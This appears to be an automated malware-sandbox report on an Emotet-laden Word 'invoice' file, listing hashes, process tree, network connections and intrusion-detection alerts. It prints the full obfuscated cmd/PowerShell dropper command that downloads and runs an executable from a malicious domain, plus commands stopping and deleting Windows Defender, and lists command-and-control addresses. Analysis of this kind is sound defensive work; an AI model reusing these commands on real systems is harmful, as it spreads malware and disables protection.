File name: | INVOICE_C0-03-99-8816.doc |
Full analysis: | https://app.any.run/tasks/1eb6a9a4-1f7a-4fa4-bb2d-c4cefd4e079f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 08, 2018, 08:07:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Cole-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 03:58:00 2018, Last Saved Time/Date: Thu Nov 8 03:58:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 5E85C3EBED20DC34766E9B1DB3CB8740 |
SHA1: | 90A1B85EEF0DFECBA2D7A7AA63E60C290FC59706 |
SHA256: | F5157BB10F4869655706640C47F5DEDD2A97A8FFD49284FFF261427521F66BEB |
SSDEEP: | 768:L9EVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o92pw6ZCrrjIu:L9Eocn1kp59gxBK85fBt+a91j |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:08 03:58:00 |
CreateDate: | 2018:11:08 03:58:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Cole-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3724 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INVOICE_C0-03-99-8816.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1920 | CMD C:\wIndowS\sySTem32\CMD.ExE /C "SeT FYB=^& ((Gv '*mDr*').nAme[3,11,2]-joIN'') ( NeW-oBJecT io.StrEAMReAder((NeW-oBJecT SysTEm.iO.CoMprESSiOn.DEfLAtestrEAM( [sySTeM.IO.mEMORysTrEAm] [SysTEm.conveRt]::FrOMBASE64STrinG( 'TZBda8IwGIX/Si8CUZwpc4OhoSDq5vxAhLk5YTdJ+jbNTBPXxsYi/vdV3cDb8xweDgf9iE1kwLct/wbhggU4sgY+1AqMo2j2MY5w6tyuF4bcHmwilZQaCiJsFq6Kp+1g3d3I/l9DsJxbwysHFy4XJSzL4b644aqQ7Aq9y6v1/B9574l03uY6ZoLFkFXEA08Vv6qmw/dDOug839ZZZS2HeC+YU9Yw7fJ94YgyYf44SzYuuZ9+YvK208o1cB83KcpWyyAKcOehgymyk3mEwJQ9B9muhb9w68xbmMABME1sDkykDTR+HQXKBOcjmsd68RHVh5GR9UZbFr8oDZfOXXAWNunElHYL7UktvSSU154tPdUbRXo8nX4B') , [IO.comPResSiOn.COmpRessionmOde]::dECOmpReSs ) ) ,[SYsTEm.tEXT.ENCoDiNG]::AScII)).reAdTOeNd() && POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) ^| . ( ( ^& ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3088 | POweRsheLL sEt-ITEM ( 'va' + 'Riab'+'l' + 'e:l9eS' + '2' ) ( [TYPe](\"{1}{2}{0}\" -F'ronMent','EN','vI' ) ) ; ( (Gci ( 'Va' + 'RiAb'+'l' + 'e:L9ES' + '2') ).VALUE::(\"{2}{0}{1}{4}{3}\" -f 'ETENV','IRoNmENtV','G','ABLE','ARI' ).Invoke('fYB',(\"{0}{2}{1}\"-f 'pRo','s','cEs' ) )) | . ( ( & ('Gv') ( \"{0}{1}\"-f '*MD','r*' )).\"N`AMe\"[3,11,2]-jOiN'' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2080 | "C:\Users\admin\AppData\Local\Temp\232.exe" | C:\Users\admin\AppData\Local\Temp\232.exe | — | powershell.exe |
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2 | ||||
3956 | "C:\Users\admin\AppData\Local\Temp\232.exe" | C:\Users\admin\AppData\Local\Temp\232.exe | 232.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2 | ||||
3108 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | 232.exe |
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2 | ||||
1004 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Version: 2 | ||||
2744 | "C:\ProgramData\2tLCxMSHM32joaoIg.exe" | C:\ProgramData\2tLCxMSHM32joaoIg.exe | lpiograd.exe | |
User: admin Integrity Level: MEDIUM Description: Developed using the Dev-C++ IDE Exit code: 0 Version: 1.0.0.0 | ||||
2288 | /c sc stop WinDefend | C:\Windows\system32\cmd.exe | — | 2tLCxMSHM32joaoIg.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 5 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1052 | /c sc delete WinDefend | C:\Windows\system32\cmd.exe | — | 2tLCxMSHM32joaoIg.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 5 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3724 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3052.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SWZ2I2IEOZ9118SZLHD.temp | — | |
MD5:— | SHA256:— | |||
3776 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TI3UO3FT3CHNPDDXVLKF.temp | — | |
MD5:— | SHA256:— | |||
3344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IN7J1CI6D1ELRFIOGKTG.temp | — | |
MD5:— | SHA256:— | |||
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Tar8E67.tmp | — | |
MD5:— | SHA256:— | |||
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Cab8ED6.tmp | — | |
MD5:— | SHA256:— | |||
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\Tar8ED7.tmp | — | |
MD5:— | SHA256:— | |||
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\CabA4F0.tmp | — | |
MD5:— | SHA256:— | |||
3196 | 2tMDxMSIM32joaoJg.exe | C:\Windows\TEMP\TarA4F1.tmp | — | |
MD5:— | SHA256:— | |||
3088 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:2E6C332796340AFFBFF5230455889D0D | SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3088 | powershell.exe | GET | 200 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg/ | US | executable | 132 Kb | malicious |
1004 | lpiograd.exe | GET | 200 | 47.157.181.81:443 | http://47.157.181.81:443/ | US | binary | 132 b | malicious |
1004 | lpiograd.exe | GET | 200 | 47.157.181.81:443 | http://47.157.181.81:443/whoami.php | US | text | 13 b | malicious |
3196 | 2tMDxMSIM32joaoJg.exe | GET | 200 | 8.248.121.254:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 54.4 Kb | whitelisted |
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/ | US | text | 3 b | suspicious |
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/83/ | US | text | 3 b | suspicious |
1012 | svchost.exe | GET | 200 | 192.227.186.151:80 | http://192.227.186.151/radiance.png | US | executable | 428 Kb | suspicious |
4064 | svchost.exe | POST | 200 | 24.247.181.125:8082 | http://24.247.181.125:8082/del92/PC_W617601.8FD9427BC717562E8091001D7B675693/81/ | US | text | 3 b | suspicious |
1004 | lpiograd.exe | GET | 200 | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | binary | 148 b | malicious |
3088 | powershell.exe | GET | 301 | 50.62.102.1:80 | http://boxofgiggles.com/Ts7kBW9Yg | US | html | 308 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3196 | 2tMDxMSIM32joaoJg.exe | 74.134.5.113:449 | — | Time Warner Cable Internet LLC | US | unknown |
3196 | 2tMDxMSIM32joaoJg.exe | 34.233.102.38:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
1004 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3088 | powershell.exe | 50.62.102.1:80 | boxofgiggles.com | GoDaddy.com, LLC | US | malicious |
1004 | lpiograd.exe | 47.157.181.81:443 | — | Frontier Communications of America, Inc. | US | malicious |
3196 | 2tMDxMSIM32joaoJg.exe | 8.248.121.254:80 | www.download.windowsupdate.com | Level 3 Communications, Inc. | US | unknown |
4064 | svchost.exe | 24.247.181.125:8082 | — | Charter Communications | US | suspicious |
1012 | svchost.exe | 192.227.186.151:80 | — | ColoCrossing | US | suspicious |
3196 | 2tMDxMSIM32joaoJg.exe | 92.38.135.209:447 | — | — | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
boxofgiggles.com |
| malicious |
checkip.amazonaws.com |
| shared |
www.download.windowsupdate.com |
| whitelisted |
18.89.147.217.zen.spamhaus.org |
| unknown |
18.89.147.217.b.barracudacentral.org |
| unknown |
18.89.147.217.cbl.abuseat.org |
| unknown |
18.89.147.217.dnsbl-1.uceprotect.net |
| unknown |
18.89.147.217.spam.dnsbl.sorbs.net |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3088 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
3088 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3088 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3088 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1004 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
1004 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) |
3196 | 2tMDxMSIM32joaoJg.exe | A Network Trojan was detected | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) |
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) |
3196 | 2tMDxMSIM32joaoJg.exe | Not Suspicious Traffic | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) |